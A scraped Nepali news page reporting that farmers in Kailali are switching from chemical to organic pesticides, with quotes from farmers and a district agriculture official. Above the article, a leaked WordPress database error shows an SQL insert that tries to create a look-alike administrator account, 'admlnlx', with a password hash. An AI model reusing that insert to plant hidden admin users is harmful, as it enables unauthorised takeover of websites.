WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOGWY/4CD.OwaTSyXxkEvw0Oj6BDJY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:10:58', '', 'admlnlx', 'admlnlx')
कैलाली, मंसिर ३० –
अधिकांश किसान पछिल्लो समय रासायनिक विषादी प्रयोग गर्न छोडेर जैविक विषादी प्रयोग गर्न थालेका छन् ।
सुरु सुरुमा जनचेतना नहँुदा रासायनिक विषादी प्रयोग गर्ने किसान पछिल्लो समय भने जैविक विषादीको फाइदाबारे थाहा पाएपछि त्यसतर्फ आकर्षित हुन थालेका छन् । रासायनिक विषादी प्रयोग गरी उत्पादन गरिएको तरकारी प्रयोग गर्दा विभिन्न रोगको सङ्क्रमण हुने भएकाले जैविक विषादी प्रयोग गर्न थालेको धनगढी जाइका कृषक छेदुलाल चौधरी बताउनुहुन्छ ।
“रासायनिक विषादी प्रयोग गरेर उत्पादन गरेको तरकारी स्वास्थ्यका लागि हानिकारक हुने जानकारी पाएपछि जैविक विषादी प्रयोग गर्न थालेको छु,” अर्का किसान रामलाल चौधरीले भन्नुभयो ।
जिल्ला कृषि विकास कार्यालयका कार्यालय प्रमुख युवराज पाण्डेले अन्य जिल्लाको तुलनामा कैलालीमा रासायनिक विषादी प्रयोग गर्नेको सङ्ख्या न्यून रहेको बताउनुभयो । घातक विषादीको न्यूनीकरणका लागि विभिन्न किसिमका चेतनामूलक कार्यक्रम सञ्चालन गर्दै आएको उहाँको भनाइ छ । – रासस